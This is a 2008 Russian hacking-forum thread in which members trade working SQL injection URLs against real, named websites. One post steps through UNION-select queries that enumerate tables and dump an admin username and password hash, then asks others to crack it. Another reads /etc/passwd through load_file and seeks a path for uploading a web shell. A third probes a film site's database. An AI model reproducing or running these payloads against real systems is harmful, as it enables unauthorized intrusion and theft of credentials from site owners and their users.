Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.07.2008, 16:00
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830
Репутация:
94
|
|
блин что вы курите...
Вот смотрим версию
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+version(),2,3/*
Ага версия пятая смотрим таблицы
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+table_name,2,3+from+information_schema.tables+limit+1,1/*
находим таблицы вот актуальные
Код:
Action
Akssesuar
Colors
Complekt
Foto
Foto_old
Marks
Menu
Models
Old_avto
People
Texts
Vacancy
accessories
all_details
details
documentation
files
files_up
forum
graphic_people
inner
news
news_details
дальше идут таблицы форума (на движке phpbb)
среди них есть таблица phpbb_users
роем на колонки
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+column_name,2,3+from+information_schema.columns+where+table_name=0x70687062625f7573657273+limit+1,1/*
Где 0x70687062625f7573657273 зашифрованое 16ти битным шифрованием наша таблица phpbb_users
находим нужные нам колонки username и user_password и составляем запрос
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+concat_ws(0x3a,username,user_password),2,3+from+phpbb_users+limit+1,1/*
Получаем логин админа и зашифрованый пароль а именно
admin:178f6c2365ac7511b4bf37c8e89cc678
кто расшифрует скиньте пасс в личку плиз.
Вот и все
Последний раз редактировалось Мистерео; 11.07.2008 в 16:03..
|
|
|
11.07.2008, 16:16
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
Сообщение от Мистерео
блин что вы курите...
Вот смотрим версию
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+version(),2,3/*
Ага версия пятая смотрим таблицы
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+table_name,2,3+from+information_schema.tables+limit+1,1/*
находим таблицы вот актуальные
Код:
Action
Akssesuar
Colors
Complekt
Foto
Foto_old
Marks
Menu
Models
Old_avto
People
Texts
Vacancy
accessories
all_details
details
documentation
files
files_up
forum
graphic_people
inner
news
news_details
дальше идут таблицы форума (на движке phpbb)
среди них есть таблица phpbb_users
роем на колонки
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+column_name,2,3+from+information_schema.columns+where+table_name=0x70687062625f7573657273+limit+1,1/*
Где 0x70687062625f7573657273 зашифрованое 16ти битным шифрованием наша таблица phpbb_users
находим нужные нам колонки username и user_password и составляем запрос
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+concat_ws(0x3a,username,user_password),2,3+from+phpbb_users+limit+1,1/*
Получаем логин админа и зашифрованый пароль а именно
admin:178f6c2365ac7511b4bf37c8e89cc678
кто расшифрует скиньте пасс в личку плиз.
Вот и все Ххе...это лежит на xaker.name уже много месяцев...
|
|
|
|
11.07.2008, 16:19
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830
Репутация:
94
|
|
дык я человеку выше ее раскрутил
|
|
|
|
11.07.2008, 16:20
|
|
Новичок
Регистрация: 25.06.2008
Сообщений: 1
Провел на форуме:
7710
Репутация:
1
|
|
Неправильно выставленные права мускул юзера позволяют читать (и возможно писать) файлы:
http://ns1.profsurv.com/category_list.php?x_category_id=-1%20union%20select%20load_file(0x2f6574632f7061737 37764)
Не смог найти документрут чтобы залить шелл, кто найдет раскрытие пути или документрут - скиньте в личку, интересно.
Последний раз редактировалось ask-me-how; 11.07.2008 в 16:24..
|
|
|
|
11.07.2008, 18:28
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944
Репутация:
0
|
|
Где 0x70687062625f7573657273 зашифрованое 16ти битным шифрованием наша таблица phpbb_users
Научите переводить в 16бит!!!
Последний раз редактировалось 2la.painkiller; 11.07.2008 в 18:40..
|
|
|
|
11.07.2008, 18:32
|
|
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830
Репутация:
94
|
|
http://snak3.h17.ru/tools/ вот там и есть 16 битное шифрование
|
|
|
|
11.07.2008, 18:42
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944
Репутация:
0
|
|
ссылка не работает
|
|
|
|
11.07.2008, 18:48
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Pangeaday.org - PR 6
http://www.pangeaday.org/filmDetail.php?id=99999+union+select+1,2,3,4,5,6,v ersion(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23/*
нече интересного в БД не нашел..
|
|
|
|
11.07.2008, 19:06
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Последний раз редактировалось ~!DoK_tOR!~; 11.07.2008 в 19:10..
|
|
|
|
11.07.2008, 19:20
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?769099){kind=avatar}
Похожие темы
Линейный вид
